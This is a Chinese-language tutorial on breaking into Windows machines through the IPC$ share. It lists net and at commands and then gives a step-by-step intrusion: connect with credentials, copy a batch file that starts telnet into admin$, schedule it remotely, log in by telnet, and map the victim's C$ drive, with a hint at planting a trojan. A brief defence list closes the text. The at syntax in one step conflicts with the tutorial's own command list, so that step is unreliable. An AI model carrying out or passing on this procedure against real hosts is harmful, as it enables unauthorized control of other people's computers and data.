首先来学习几个用到的cmd的命令。

1、net use \\IP\ipc$ "" /user:"" -该命令的意思是与对方ip主机建立空连接（注意这个命令一共有4个空格哦，前后）；
2、net use \\IP\ipc$ "password" /user:"username" -意思是和前者相反是建立非空连接；
3、net view \\IP -查看目标主机共享资源；
4、net share -查看本地共享资源；
5、nbtstat -A IP -获取目标主机用户列表；
6、net user -查看本地主机用户列表；
7、net time \\IP 查看目标主机当前时间；
8、net use z: \\IP\abc-意思为将目标主机的abc共享资源映射到本地的z盘；
9、net use z: /del /y-删除映射的z盘；
10、copy \本地文件路径 \\IP\共享目录名-意思为把本地文件复制到目标主机的共享目录；
11、at \\ip 时间 程序名-为在设定的时间内运行指定程序；

好了以上就是需要用到的一些cmd的命令了，运用这些命令就可以实现我们的一些目的，但是需要指出的是空连接是几乎没有什么权限的，但是在此类入侵的整个过程中确也是相当重要的。当然如果你是用工具直接扫描到对方ip，弱口令的话就另当别论了。好了我们开始吧。

第一、打开运行输入cmd进入cmd命令行窗口，也就是我们平时说的dos窗口；
第二、输入net use \\目标IP\ipc$ "密码" /user:"用户名"。还是提醒大家注意这个命令的空格，use前后和密码前后各有2个空格，否则语法就错误了；
第三、输入net view \\目标IP 查看一下目标开放了哪些共享目录，但是问题又来了如果对方没有开启共享我们就需要手动给对方开启这个服务了，可以建一个内容为“@net start telnet”的记事本文件命名为sys.bat放到自己的c盘根目录；
第四、输入 copy c:\sys.bat \\目标IP\admin$ 这样我们就把刚才建的那个文件复制到对方主机的根目录中，当然很有可能复制失败，原因很多具体大家可以参考百度一下；
第五、我们要在目标主机运行这个批处理文件，我们先输入net time ip  获取对方主机的当前时间，比如获取到的时间为12：15，然后我们输入at sys.bat 12：18 \\目标IP ，也就是让该文件在3分钟后自动运行，也就是计划任务自动运行；
第五、输入telnet 目标ip，这样就就可以对方建立telnet连接了，即远程登陆，也可以说基本拿到对方主机的控制权了，但是下面需要做的是 打开远程主机的ipc$共享，默认共享，普通共享的操作；
第六、退出telnet，映射对方共享盘符，输入net use h: \\目标IP\c$ ，即为将对方的C盘映射到本地盘的h盘，到此为止，你就可以在你的电脑上对其随意操作了，就想和自己的电脑一样。（到此为止）以上没有提到后门木马，相信大家都拿到控制权了就不用在说了吧。

那么怎么防范IPC$入侵呢？这才是我们今天的重点：

1、IPC$是需要服务支持的，所以我们可以把它依赖的服务或端口关闭，比如把Server服务禁止（不是停止），关闭自己的139 ， 445 端口或用防火墙软件屏蔽掉这些端口；
2、给自己的电脑设置复杂一些的密码，防止hacker用弱口令工具扫描到，最保险的方法是把默认的administrator用户名删掉，重新建立一个其他名字的管理员账户；
3、最好是一起把 NetLogon 服务也禁用掉，注意不是停用哦；
4、平时一定要注意修补系统漏洞，防止被攻击者利用等等。

好了就说这么多吧，当然想利用IPC$入侵也不是那么容易的，只要我们做好以上几点就可以防范IPC$入侵了。